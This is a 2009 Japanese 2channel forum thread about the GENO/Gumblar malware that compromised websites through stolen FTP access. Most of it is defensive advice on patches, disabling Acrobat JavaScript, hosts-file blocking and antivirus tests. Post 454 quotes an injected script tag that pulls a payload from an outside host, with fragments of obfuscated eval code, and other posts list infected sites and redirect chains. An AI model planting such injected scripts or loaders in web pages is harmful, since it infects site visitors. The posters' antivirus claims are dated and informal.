[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 2chのread.cgiへ]
Update time : 05/09 15:33 / Filesize : 157 KB / Number-of Response : 689
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

GENOウイルススレ ★22



1 名前:名無しさん@お腹いっぱい。 [2009/06/22(月) 12:15:57 ]
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

440 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:34:56 ]
ΩΩΩ<な(ry

まぁ実際問題7がびす太ほどアレじゃなければ乗り換えようかと思ってるがな

441 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:37:41 ]
vistaでもUAC切ってたらマズイんだよな?
やかましいから切ってるけど

442 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:39:48 ]
スタッフ写真無くて(´・ω・) ツマンナス

443 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:45:37 ]
>>441
この件に関してはUACは関係ない
もちろん有効にしておいた方がより安全だが

444 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 01:45:52 ]
結局だれも教えに行ってないのかバロス

445 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 01:52:26 ]
管理者様

急啓
ていへんだぁていへんだぁ
おたくのサイトがていへんだぁ
顧客に毒盛り、ていへんへんだぁ
              かしこ


FAX番号わかったけど(´・ω・) ツマンナス

446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:07 ]
ググるとHPのタイトル部分にスクリプトを埋め込まれたのがいっぱいヒットするな、もう無差別攻撃か・・・

447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:34 ]
p-frying●com/

ここも感染してる
ていうか前のGENO騒ぎの時から感染してるっぽい

448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:10:06 ]
.は●に変えたがh抜き忘れたorz



449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:12:11 ]
この攻撃ってAdobeが脆弱性発表したらすぐに蔓延したんだよな
発表しなかったらこんなことにならなかったかもな
まあそう言うわけにもいかないのかも知れないが

450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:29:19 ]
>>446
なにでググってる?
martuzあたり?

451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:44:05 ]
木造で中古だと利回りがきつそうで(´・ω・) カワイソス

452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 10:31:32 ]
Avast!のWebシールドが最近の*.phpにも反応するようになった

453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 11:29:45 ]
糞チェッカー
バージョン指定書きで後で後悔するといったのにねえ
さすがアフィ厨

454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 13:25:50 ]
>>425-427
<script src=hxxp://fotothhi.be/images/index.php ></script>

.phpの中身
//<script>
dLLdw=24;if(unescape)dLLdw='';jYCXE=unescape('%'+dLLdw);
〜中(難読化されてたから)略〜
eval(unescape(i0j.replace(/[IlN]/g,jYCXE)));
//</script>


455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:17:13 ]
サイトはどうやって改ざんされてるんだ?


456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:26:44 ]
>>452
いろいろ試した感じだとIE6なら金曜くらいから拾ってそうな感じだった
他も拾うようになったのかな

457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:27:38 ]
>>455
FTP使って改ざんされてます
サーバに攻撃とかそういうのじゃないです
つーかこのへんは前と変わってないはず

458 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:52:05 ]
>>456
同じサイトの検体でも日が違うと中身が変わって対応状況はバラバラ
今はAvast!とKasperskyの対応がよさそう

2/41 (4.88%)
ttp://www.virustotal.com/jp/analisis/34330a5a110da2ed5f57ee54b7b8df05a8a8d7971e8d898b6f99fe6fb5e6442d-1256440050
5/41 (12.20%)
ttp://www.virustotal.com/jp/analisis/39669ef4eabe7224ff262f678579542e39be15316f4125bd58b74c6c18fb472c-1256440598



459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:39:07 ]
何となく思ったのだが

何気に Vista、Windows7 への移行を促そうとする
大人の事情が暗に蠢いていたりとかするのだろうか…

460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:43:01 ]
7への移行とアンチウイルス2010年版への移行を促すための業界ぐるみのイベントだろ

461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 17:56:34 ]
>>458
日ごとどころかアクセスするたびにかわるわよ
でも非IEでもAvastが対応してきたようだね

462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:08:42 ]
XPの脆さが改めて露呈しただけだろ

463 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 18:10:56 ]
Flashのアップデートしてなくてアンチウイルス入れてないやつがたんまり
居るってことだな
MSE普及の一環か

464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:22:40 ]
カスペでさっき遮断した
本当に困る

465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:30:55 ]
>>463
MSEはおろかノートンやバスターでブロックできんからこれだけ広まってるんだろ

466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:34:44 ]
>>463
Flash Playerだけじゃないよ

467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:39:31 ]
genolists.alink.uic.to/
新種感染サイトのリストはここ使うの?

468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 19:04:29 ]
>>450
Google先生は、AS番号ごとにウイルス感染サイト(gumbler以外も含む)を教えてくれるよ。

例えば、
楽天(infoseek.co.jp、cool.ne.jp)
safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23820
Softbank(geocities.jp)
safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23816
とかね。

最近までgumblar/martuzに改竄されて放置されてたサイトは、
新型に改竄されてる可能性が高い。



469 名前:あげ [2009/10/25(日) 20:08:52 ]
fileseek.jp/(携帯専用)
PCサイト閲覧Proxyのメニュー(*ボタン)からソースを見れるから
簡易チェッカーとして使えるかもしれん。
※パケ定必須

470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:05:38 ]
>>465
ノートンは脆弱性を遮断する機能で防げるんじゃないだろうか

471 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 22:19:28 ]
バスター最新にしても駄目?

472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:43:57 ]
>>471
それよりもAdobeのアップデートとWindowsアップデートしとけば問題ない

473 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:45:00 ]
>>470
分かる範囲でいくつかのサイトに行ったがすべてその機能で遮断できる

474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:10:28 ]
アップデート全部したんだが、これで再起動しても平気かな?

475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:00 ]
ソフトの更新は予防のためにするものであって
感染後にやっても手遅れだよ

476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:15 ]
/(^o^)\

477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:51 ]
>>474
カスペのオンラインスキャンでウイルススキャンしてからのほうがいいよ

478 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:56 ]
>>468 その2つのページだけで、日本国内のgumblar.x感染サイトが9つある。

ikebananonohana●hp●infoseek●co●jp
pengzipk●hp●infoseek●co●jp
seiya06●hp●infoseek●co●jp
pee3●hp●infoseek●co●jp
www●ski-srsc●com
www●geocities●jp/fumisugi43/
www●geocities●jp/jr1ujx/
www●geocities●jp/tileaf05/
www●jpla-aichi●com

こりゃ、国内60サイトどころじゃないでしょ。



479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:15:55 ]
>>477
現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。
機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。
また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。

480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:17:51 ]
ニフティもエンジンはカスペだからそっちでやればいいんじゃね

481 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:18:41 ]
>>474
ちなみに全部ってのは本当に全部やったの?
たとえばFlash PlayerはIEとそれ以外じゃ別のものだよ

482 名前:473 mailto:sage [2009/10/25(日) 23:23:45 ]
さらに色々調べたが
ノートンはファイルの検査では検出しないけど
ブラウザで読み込むと検出する
サイトアドレスではなくファイルで検出するようだ

この後バスター入れて試してみる

483 名前:473 mailto:sage [2009/10/26(月) 00:10:01 ]
バスター入れてみたが試した範囲ではすべて遮断される
ただデスクトップにおいたphpファイルは読み込める
2度目以降は無効になるような場合でも遮断される
サイトアドレスで遮断してるように思えるがよく分からない

484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:29:06 ]
>>483
調査乙

485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:48:20 ]
>>483
激乙です!
てことは大抵のアンチウイルスソフト入れてる人は
感染したサイト見ても、とりあえず感染は防げてるってことなのかな
マカフィーはどうだろう

486 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:56:15 ]
>>485みたいのが一番危ないタイプだな

487 名前:473 mailto:sage [2009/10/26(月) 00:58:05 ]
>>485
その前に試したPandaは読み込めちゃったね
違う段階で遮断できるかも知れないけど

488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:05:20 ]
>>486
アンチウイルスソフトやウインドウズアップデートは最新にしてたんだけど、
adobeは最新の一つ手前くらいのままだったからやっぱり感染したかな…

>>487
そっかー
即レスありがとう



489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:19:27 ]
>>488
心配ならOSいれなおし

490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:26:06 ]
データのバックアップしても、入れ直したパソにそのデータ入れたら、再感染だよね?
このウイルスはそんなことないとかないかorz

491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:47:59 ]
>>488
セコムに入っているから大丈夫!と鍵をかけずに外出したようなものだね
モノに頼ってそれに過信してしまって
一番肝心なところである
それを使う人間がセキュリティへの認識を忘れてしまっては
どんなに優れたモノを使っていても意味をなさないよ

492 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:51:13 ]
アップデートは最低でもこれくらいやらないとな

Windows Update / Microsoft Update
Adobe Flash Player 10.0.32.18 (IEと非IE両方)
Adobe Reader 9.2 (導入済ならアップデート。ReaderのJavaScriptは切る)

上記は現段階の新型Daonol/Gumblarには必須
亜種でどうなるか分からないので下記も実施

Adobe Shockwave Player 11.5.1.601 (導入済ならIEと非IE両方。正直アンインストールでいい)
Java 6 Update 16 (旧バージョンはすべてアンインストール)

あとはQuickTimeとRealPlayerあたりか
使わないものはアンインストールだな

493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:53:31 ]
>>490
確実に大丈夫とはいえない

494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:00:49 ]
今回Adobeのいつ頃のき弱性をついたものなのかもう分かってるの?

495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:04:00 ]
もうFlashなんかやめてSilverlightを採用すればいいのに

496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:06 ]
Windows Updateぐらい自動更新の設定にしとこうよ
というかMSがWindows Updateの対象にAdobe ReaderとFlash入れるだけでいいのに

497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:44 ]
「ぜいじゃく」って読むんだよ、ぼうや

498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:04 ]
きじゃくてwww
言語弱者もいいとこwww



499 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:49 ]
釣られんなよw

500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:11:04 ]
後釣り宣言カコワルイ

501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:13:52 ]
生酒でも飲んでまったりやろうや

502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:18:19 ]
この時間から酒飲むと朝つらいからお断りします

503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:23:56 ]
>>494
特定の脆弱性だけじゃなく複数利用してる
Adobe製品だけじゃなくMicrosoftのもあった
いろいろな組み合わせみたいなんで確実にこれだけふさげばいいってものはないよ

504 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:37:29 ]
【中卒の為の国語辞典】

脆弱性 【ぜいじゃくせい】

脆【もろ】く、傷つきやすいこと。攻撃に対して弱いこと。

505 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:02:18 ]
前のGENOの時はメールとかお気に入りとか、そういうファイルデータにつく
ウイルスじゃないから、感染してからバックアップとっても
平気とかどこかで見た気がする。
もちろんデータをクリーンインストールしてから戻すときは
当然ウイルスチェックしてからということだったけど。

506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:05:13 ]
ぜいじゃく性ですね
すみません
本当に恥ずかしい間違いでした
教えてくれてありがとうございます

507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:15:35 ]
本当の読み方はぜいじゃくしょう
ただ、最初に用語辞典に載った時にぜいじゃくせいとルビを振られたから今の読みになった
豆知識

508 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:39:39 ]
>>507
恥ずかしい限りですが勉強になります

やっぱりアップデートとかをこまめにするのが一番ですが
今回のは駆除はカスペができるようなので、カスペで無事検出駆除できた人は
OS再インスコしなくて良さそう?なのかな?



509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:41:22 ]
カスペで駆除できたって報告あるか?

510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:50:26 ]
ありますんね・・・

511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:09 ]
カスペ自らが宣言してるけどどこまで対応してるのかわからん
www.kaspersky.co.jp/news?id=207578788

512 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:29 ]
試しに感染してみるか
古いアドビのソフトがあれば

513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:03:41 ]
無駄無駄
アンチウィルスソフトに過剰な期待を抱かないほうがいい
日々、腐るほど亜種が湧いてるからな

514 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:04 ]
そのうちvistaや7も感染対象になるのかね

515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:25 ]
カスペもオンラインスキャナをメンテ中とか鬼だよな。


516 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:11:48 ]
Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
www.forest.impress.co.jp/docs/review/20091020_323014.html
hide9999.web.fc2.com/

517 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 07:13:03 ]
既出
もともと自動

518 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:14:02 ]
無料駆除ツールでてますか?
カスペ体験版入れるしかないのか・・・



519 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:23:46 ]
体験版じゃなくて製品版買えばいいだろ

520 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 11:45:48 ]
HD買ってきてOSインストールして
外したHDを外付けにしてバスター2010でウイルススキャン
トロイ式なんとかかんとか と出て隔離に成功

なんでも最新がいいんだなと思って IEは6から8へ
バスターも06から10へ

正直新しいPC買ったみたいです(^O^)

521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 14:46:01 ]
>>420
富士通よりシェアがデカいNEC(1位NEC 2位富士通)も当然パンク、
富士通にならってリリース出しました。

【お詫び】電話お問い合わせ窓口の混雑について
ttp://121ware.com/navigate/support/121cc/info/20091026/

東芝
ttp://dynabook.com/assistpc/info/20091022.htm
SONY
ttp://search.vaio.sony.co.jp/solution/S0910211068384/
DELL
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022

522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 15:09:12 ]
>>521
一昨日だっけか?東芝のサポートって類似の質問はないとか言って蹴ってなかったか?

523 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 15:32:57 ]
>>508
前回のも普通に駆除できるから
無知が作ったウィキなんて信用するなよ

524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 16:20:54 ]
SonyはVistaも対象に含めているのか

525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:01:40 ]
なんだろこれ・・・

www■idealgroup-24■com/
→ theflyingpoodles■com/images/DSC_0035■php
→ chezmichel■nl/images/index3■php
→ bellsworld■com/new_submissions/verhor1■php
→ psunrise■cn/images-d/index2■php (アクセス拒否)

最後のアクセス拒否以外の中身が妙な404で AguseGatewayで見ると//404
ソース見るといずれも // iframes are EVIL! Hate Zeus!  というメッセージ付き

526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:14 ]
なんで

527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:54 ]
途中送信orz

なんでabout:blank開いてんだこれ
本当に404なら分かるけど

528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:18:49 ]
>>524
でもソニーはウイルス名の指定がないな。
とにかくリカバリしやがれ(意訳)の一点張り。あんまりあてにできないのでは。



529 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:23:58 ]
Zeusっつーとこれかな
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091007/338476/

530 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:25:43 ]
Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2045
25日時点でカスペルスキーが「Trojan-Downloader.JS.Gumblar.x」の検出名で全件を、
Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
G Dataが「JS:Downloader-EZ」で13件を検出した。
ちなみに前日に行った3件の事前調査では、カスペルスキー以外は全滅だった。

531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:06:13 ]
japan.internet.com/webtech/20091010/12.html
>Adobe の勧告には、次のような記述がある。
>「『Windows Vista』上で DEP (データ実行防止) 機能を有効化している
>Adobe Reader および Acrobat 9.1.3 のユーザーは、この攻撃の影響を受けない。

10/13のAcrobatの脆弱性ですが
VISTAでもDEPが無効だと駄目だったようですね。
VISTAがプレインストールされているPCだと
CPUがDEPにまず対応している気がしますが・・・

532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:44:06 ]
XPでハードウェアDEPが有効かつ
IE8のメモリ保護が有効だった場合はどうなんでしょうね・・・
VISTAと同様の結果になるのか、違うのか・・・

533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:17:04 ]
ソフト使わなくても、FlashPlayerとAdobeReaderを自動でアップデートできるって
上のほうで言われてるから調べてみた。
■FlashPlayer
www.adobe.com/jp/support/kb/ts/228/ts_228473_ja-jp.html
■AdobeReader(9.20は編集>環境設定>アップデーターでできた)
www.geocities.jp/fssreport/update/article003/index.html

>Flash Player の自動更新のチェックはバックグラウンドでの動作ではなく、
>ブラウザ上で Flash コンテンツを読み込んで Flash Player が起動した際に実行されます。

FlashPlayerだけでなく、AdobeReaderも同じだと思うんだけど、起動した際にアップデートって、
ウィルスつきのファイルを開く直前に最新版になれるって解釈していいんだろうか。

534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:32:53 ]
Flash_Reader_Updateはアップデート作業を「半自動化できる」ソフト

自動でアップデートするものでは無いから大差ない

535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:53:50 ]
>>533
いつも主導で更新しちゃってるから自動のチェックタイミングわからないんだけど
アプリ起動時のチェックだとしたら最新版になる前に攻撃くらうだろうね

536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:54:31 ]
主導→手動でしたごめん

537 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:13:54 ]
Adobe ReaderとAdobe Flash Playerはいつアップデートあるのかわからない
アップデートは手動、Adobeのサイト言ってチェックしないといけない

538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:22:16 ]
過去の更新状況から考えると
更新があった場合はコンテンツが表示されたあとで
更新のダイアログが表示されていたはずだから
>>533の場合は既に攻撃を喰らったあとだろう




539 名前:533 mailto:sage [2009/10/27(火) 00:47:38 ]
レスくれたひとありがとう。

Flash_Reader_Updateは半自動化しかしてくれなくても、
インターネット前に必ずアップデートするとか、
>>387の記事のように、タスクスケジューラ使うようにすれば、
>>533みたく『起動してから』じゃなくて、『事前に』最新版にできるんだよね。
ソフトDLすることにするわ。
記事みて検索してはじめて、タスクスケジューラを知った初心者だけどw

540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:50:55 ]
すまん感染の疑いのある者なんだがご教授願いたい
当方win機(一昨日買ったばかりwin7)とMac(OSX10.4)を使っている。
これらを使ってxoopsを使ったサイトを立ち上げようとした。
xoopsの構成ファイルをアップロードしようとしたらmacでは問題なくできた。
しかしwin機を使わなければならない事情がでてFFFTPを使ったら毎回225 ABORcommand successfulが出て強制終了がでる。
このエラーをググったらGENOウイルスの仕業らしい、と。

自分的には可能性として
1.win機が感染している
2.Mac機が感染、もしくは保菌者(?)になっている
3.レンタルサーバーの業者自体が感染している

なお、ウイルス対策としてはwinは買ってすぐマカフィーをインストールして最新の状態
Macは6月末にvirusbarrierが切れたからClamXavでつないでいる状態、最新の状態

現在フルスキャン中ですがウイルスは見あたってません。このスレの皆さんの知恵がいただければ幸いです。






[ 続きを読む ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<157KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef